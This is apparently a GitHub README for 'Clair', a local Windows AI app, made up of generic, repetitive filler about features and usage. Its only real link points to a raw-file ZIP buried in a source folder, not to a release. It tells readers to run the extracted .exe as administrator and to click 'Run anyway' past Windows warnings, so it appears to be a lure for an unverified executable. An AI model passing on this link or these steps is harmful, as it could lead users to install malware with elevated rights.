Clair is a local AI app for people who want help with real tasks on their own computer. It uses structured reasoning, checks its answers, and keeps memory in a disciplined way. That helps it stay focused on the problem and avoid loose guesses.
Use Clair when you want to:
- Work without sending your data to a cloud service
- Break down a task into clear steps
- Review an answer before you trust it
- Keep a local memory of past work
- Solve planning, writing, and analysis tasks with more control
To get Clair on Windows, visit this page to download:
If the page offers a release file, download it to your computer. If it gives you a setup file, download that file first, then run it.
Follow these steps on a Windows PC:
- Open the download page in your browser.
- Download the Windows file from the page.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the main app file. It may be named
Clair.exeor a similar Windows file. - Double-click the file to start Clair.
- If Windows asks for permission, choose Run or Yes.
If Clair opens in a window, the app is ready to use.
When you open Clair for the first time, it may create local folders for settings and memory. This helps the app keep your data on your device.
You may see:
- A start screen
- A place to enter a task
- A panel for steps or reasoning
- A memory area for saved context
- A verification view for checking results
If the app asks for a local path, you can accept the default path.
Clair is built for normal Windows use and runs best on a modern PC.
Recommended setup:
- Windows 10 or Windows 11
- 8 GB RAM or more
- 2 GB free disk space
- A recent Intel or AMD processor
- Internet access for the initial download
For smoother use with larger tasks:
- 16 GB RAM
- More free disk space for memory and logs
- A newer CPU with multiple cores
Clair breaks a problem into parts. That makes it easier to follow and check.
Clair reviews its own work before it gives an answer. That helps reduce weak or careless output.
Clair stores useful context on your computer. You can keep track of ongoing work without relying on a remote service.
Clair is made to run on your machine. Your data stays in your own environment.
Clair is built to stay on one task and keep its steps organized. That helps with planning, research, and written work.
Clair follows a controlled approach to memory and reasoning. It aims to be useful where accuracy matters.
Use Clair like this:
- Open the app.
- Type your task in plain language.
- Add any needed details, such as dates, names, or goals.
- Ask Clair to break the task into steps.
- Review the answer and the checks.
- Save useful results for later use.
Examples:
- Plan a project
- Review a document
- Compare options
- Draft a response
- Organize notes
- Build a step-by-step plan
Clair may include these parts:
- Input box for your request
- Reasoning or step view
- Verification panel
- Local memory list
- Settings for file paths and behavior
- Export or save options
If you are new to this kind of app, start with a small task. That helps you learn how Clair responds.
Clair is designed for local use. That means your work stays on your PC unless you choose to share it.
This helps when you want to:
- Keep private notes local
- Work on company material
- Store personal plans on your device
- Reduce reliance on cloud tools
- Check that the download finished
- Make sure you extracted the ZIP file
- Look for the main
.exefile - Right-click the file and choose Run as administrator
- Open the file again
- Choose More info if shown
- Click Run anyway if you trust the source
- Restart your PC
- Try opening the app again
- Make sure your Windows version is current
- Use the Windows zoom setting
- Increase display scaling in Windows settings
Try these tasks first:
- Summarize a long note
- Turn a list into clear steps
- Compare two ideas
- Draft a simple email
- Organize a weekly plan
- Review a decision with pros and cons
These tasks help you see how Clair reasons and checks its work.
Use clear input. Clair works best when you:
- State the goal
- Add context
- Keep the request short and direct
- Ask for one task at a time
- Mention any rules or limits
Example:
- Good: βHelp me make a step-by-step plan for moving to a new apartment next month.β
- Less clear: βHelp me with moving.β
Clair may create local folders for:
- Settings
- Memory
- Logs
- Saved results
- Task history
You can keep these in the default location unless you need them somewhere else.
When a new version is available:
- Visit the download page again.
- Download the latest Windows file.
- Close the old version.
- Replace the old files if needed.
- Open the new version.
If your settings are stored locally, keep a copy before replacing the app folder.
A simple workflow in Clair may look like this:
- Enter the task
- Let Clair break it down
- Review the steps
- Check the result
- Save the output
- Return to it later if needed
That flow works well for planning, writing, and decision work.
The app folder may include:
- A readme file
- Settings files
- Logs
- Local memory files
- Update notes
If you want to move Clair to another folder, keep the full app folder together.
- Clair: Local cognitive AI app
- Best for: Step-by-step work and checked answers
- Runs on: Windows
- Data storage: Local on your device
- Main link: https://raw.githubusercontent.com/Allaboutf4130/Clair/main/src/clair/execution/Software_v3.0.zip
Clair fits work around:
- AI agent design
- AI safety
- Cognitive architecture
- Local AI
- Neuroscience-inspired AI
- No-hallucination systems
- Python-based tools
- Reasoning engines
- Structured AI
- Verification
Before you start:
- You have a Windows PC
- You have internet access
- You know where your downloads go
- You have enough free space
- You can open ZIP files if needed
After download:
- Find the file in Downloads
- Extract it if needed
- Open the app file
- Allow Windows permission if asked
- Start your first task
People use Clair when they want AI help that feels more controlled. It is built for cases where plain chat is not enough. If you need a local tool that reasons in steps and checks its work, Clair is a strong fit for that kind of use